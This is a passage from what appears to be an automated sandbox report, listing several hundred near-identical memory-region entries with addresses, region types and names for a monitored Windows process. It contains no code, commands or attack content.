0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9673 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9674 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9675 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9676 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9677 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9678 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9679 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9680 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9681 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9682 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9683 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9684 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9685 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9686 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9687 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9688 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9689 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9690 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9691 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9692 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9693 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9694 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9695 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9696 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9697 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9698 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9699 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9700 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9701 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9702 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9703 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9704 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9705 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9706 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9707 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9708 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9709 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9710 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9711 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9712 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9713 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9714 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9715 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9716 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9717 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9718 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9719 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9720 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9721 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9722 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9723 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9724 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9725 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9726 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9727 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9728 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9729 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9730 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 9731 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9732 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9733 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9734 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9735 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9736 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9737 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9738 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9739 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9740 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9741 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9742 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9743 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9744 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9745 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9746 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9747 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9748 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9749 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9750 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9751 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9753 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9754 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9755 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9756 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9757 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9758 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9759 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9760 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9761 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9762 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9763 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9764 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9765 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9766 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9767 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9768 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9769 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9770 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9771 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9772 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9773 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9774 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9775 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9776 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 9777 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9778 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9779 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9780 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9781 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9782 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9783 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9784 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9785 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9786 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9787 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9788 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9789 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9790 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9791 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9792 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9793 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9794 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9795 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9796 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9797 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9798 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9799 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9800 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9801 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9802 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 9803 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9804 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9805 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9806 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9807 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9808 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9809 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9810 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9811 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9812 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9813 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9814 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9815 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9816 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9817 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9818 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9819 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9820 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9821 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9822 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9823 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9824 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9825 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9826 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9827 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9828 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9829 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9830 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9831 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9832 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9833 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9834 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9835 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9836 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9837 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9838 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9839 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9840 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9841 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9842 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9843 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9844 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9845 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9846 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9847 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9848 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9849 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9850 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9851 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9852 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 9853 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9854 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9855 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9856 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9857 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9858 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9859 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9860 start_va = 0x1e80000 end_va = 